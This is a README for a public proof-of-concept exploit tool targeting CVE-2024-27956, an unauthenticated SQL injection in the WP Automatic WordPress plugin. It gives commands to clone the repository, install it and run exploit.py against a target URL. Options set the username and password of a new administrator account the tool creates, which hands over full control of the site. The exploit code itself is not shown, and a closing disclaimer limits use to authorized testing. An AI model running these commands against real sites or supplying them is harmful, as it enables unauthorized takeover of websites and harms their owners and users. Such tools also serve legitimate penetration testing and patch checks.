
CVE-2024-27956 - WP Automatic SQL Injection Exploit Tool
A proof-of-concept exploit for the SQL injection vulnerability in WP Automatic plugin (CVE-2024-27956) affecting WordPress sites.
This exploit targets a critical unauthenticated SQL injection vulnerability in the WP Automatic plugin (versions < 3.9.2.0) for WordPress. The vulnerability allows attackers to create administrative users and gain full control of vulnerable websites.
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
python3 exploit.py http://vulnerable-site.com
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
positional arguments:
url Target WordPress URL
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username for the new admin account
-p PASSWORD, --password PASSWORD
Password for the new admin account
This tool is provided for educational and authorized penetration testing purposes only. The developer is not responsible for any misuse of this software. Always obtain proper authorization before testing any systems.
This project is licensed under the MIT License - see the LICENSE file for details.